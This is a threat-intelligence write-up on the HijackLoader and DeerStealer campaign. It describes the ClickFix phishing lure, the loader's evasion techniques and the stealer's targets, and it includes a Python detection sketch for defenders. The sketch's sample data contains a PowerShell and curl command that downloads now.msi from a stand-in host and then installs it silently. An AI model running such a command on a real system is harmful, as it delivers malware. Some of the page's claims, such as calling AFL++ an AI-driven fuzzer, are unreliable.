Introduction

A recent surge in cyber-attacks has been identified, involving the sophisticated malware duo HijackLoader and DeerStealer [2]. These attacks employ advanced phishing tactics to deceive victims into executing harmful commands, posing a significant threat to cybersecurity.

Description

A new wave of cyber-attacks has been observed involving the malware duo HijackLoader and DeerStealer, which utilize sophisticated phishing tactics to lure victims into executing malicious commands [3]. Discovered by eSentire’s Threat Response Unit (TRU) [1], these campaigns employ ClickFix as the initial access vector [1] [3], redirecting victims to phishing pages that instruct them to run a PowerShell command via the Windows Run prompt [1] [2] [3]. This command downloads a malicious installer named now.msi [2] [3], which is executed via msiexec.exe and leads to the activation of HijackLoader, ultimately releasing the DeerStealer payload [3].

HijackLoader [1] [2] [3] [4], first observed in 2023 [2], is known for employing advanced techniques such as steganography to hide encrypted configurations within PNG images. Once activated [1], it exploits legitimate binaries to run unsigned malicious code [1] [3], utilizing module stomping to inject payloads into signed binaries and performing dynamic API resolution with custom hashing algorithms [2]. The loader decrypts its second stage from files like Bairrout.xd using hardcoded offsets and cryptographic methods [2]. It then performs module stomping on input.dll and launches a renamed Q-Dir binary to execute the final payload [2], DeerStealer [1] [2] [3] [4].

DeerStealer [1] [2] [3] [4], marketed on dark-web forums as XFiles Spyware, is a subscription-based infostealer that extracts data from over 800 browser extensions [3], desktop wallets [2], VPNs [2], gaming clients [2] [3] [4], email applications [2] [3], and RDP clients [2]. It hijacks over 14 types of cryptocurrency wallets through clipboard monitoring and features hidden VNC for stealthy remote access. Subscription prices range from $200 to $3000 per month [2], with higher-tier offerings providing advanced features such as re-encryption, payload signing [3], and AI-driven enhancements [3].

Communication with its command and control (C2) server occurs via encrypted HTTPS channels, utilizing a proxy system named “Gasket” to obscure the true server IPs [2]. Initial check-ins fingerprint the host using the Windows installation date/time [2], GUIDs [2], and CPU names [2], while encrypted ZIP files are employed for data exfiltration [2]. The campaign is particularly dangerous due to its evasion tactics [2], which include bypassing email-based security [2], abusing Living Off the Land Binaries (LOLBins) such as curl.exe and msiexec.exe [2], and employing modular obfuscation that complicates static analysis. The emergence of these AI-driven malware variants marks a significant shift in the threat landscape [4], as they operate at scale and pose a serious challenge to cybersecurity measures [4]. Despite the availability of HijackLoader extractors [2], threat actors appear undeterred [2], indicating either negligence or confidence in their ability to remain undetected [2]. Penetration testers are advised to employ AI-driven fuzzers like AFL++ to identify vulnerabilities that such malware might exploit [4], use Cobalt Strike for simulating AI malware evasion techniques [4], and train clients to monitor for unusual network traffic [4], as AI malware often leaves subtle traces [4].
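The execution chain described above (a command pasted into the Run prompt fetches now.msi, which msiexec.exe then installs) can be surfaced from process-creation telemetry. The following Python sketch is an added example, not code from the page or from eSentire's TRU: it runs two heuristics over constructed process-creation records, and the field names, paths and the lure URL are assumptions, not indicators from the campaign.

```python
import re
import ntpath

# Constructed process-creation records (not real telemetry); the field names are
# assumed, modelled on EDR / Sysmon Event ID 1 data: parent image, image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c curl.exe -o %TEMP%\\now.msi https://lure.example.invalid/now.msi"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\AppData\Local\Temp\now.msi /qn"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /V"},  # benign: the Windows Installer service itself
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# User-writable staging locations where a phishing-delivered .msi typically lands.
USER_DIR_RE = re.compile(r"(\\Temp\\|\\Downloads\\|%TEMP%|\\AppData\\)", re.IGNORECASE)
# Interpreters and LOLBins a pasted Run-prompt command starts from explorer.exe.
RUN_PROMPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe", "mshta.exe"}

def classify(event):
    """Return the names of the detection rules an event matches (possibly none)."""
    parent = ntpath.basename(event["parent"]).lower()   # ntpath: Windows paths on any host
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"]
    hits = []
    # Rule 1: explorer.exe (the Run prompt) spawning an interpreter or LOLBin whose
    # command line carries a URL, i.e. a user pasting a downloader one-liner.
    if parent == "explorer.exe" and image in RUN_PROMPT_CHILDREN and URL_RE.search(cmd):
        hits.append("run_prompt_downloader")
    # Rule 2: msiexec.exe installing from a URL or a user-writable directory, started by
    # a scripting host or the shell rather than the installer service (tune for your estate).
    if image == "msiexec.exe" and (URL_RE.search(cmd) or USER_DIR_RE.search(cmd)):
        if parent in RUN_PROMPT_CHILDREN or parent == "explorer.exe":
            hits.append("msiexec_user_staged_package")
    return hits

def scan(events):
    """Map each event index to its matching rules, omitting clean events."""
    return {i: classify(e) for i, e in enumerate(events) if classify(e)}

if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {', '.join(rules)} :: {SAMPLE_EVENTS[i]['cmdline']}")
```

Rule 2 will also fire on hand-run installs from Downloads, so in production it is a correlation signal (chained after rule 1 on the same host) rather than a standalone alert.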

Conclusion

The emergence of HijackLoader and DeerStealer represents a significant evolution in cyber threats, leveraging advanced techniques and AI-driven capabilities. These developments underscore the need for enhanced cybersecurity measures, including the use of AI-driven tools for vulnerability detection and simulation of evasion techniques. Organizations must remain vigilant, continuously updating their defenses and training personnel to recognize and respond to these sophisticated threats. The ongoing adaptation and resilience of threat actors highlight the importance of proactive and innovative approaches to cybersecurity.

References

[1] https://www.infosecurity-magazine.com/news/hijackloader-deerstealer-target/
[2] https://securityonline.info/new-malware-duo-hijackloader-deerstealer-surge-bypassing-defenses-for-data-theft/
[3] https://trustcrypt.com/ar/threat-actors-exploit-hijackloader-and-deerstealer-to-compromise-victims/
[4] https://pentestpro07.blogspot.com/2025/06/cracking-todays-cyber-chaos.html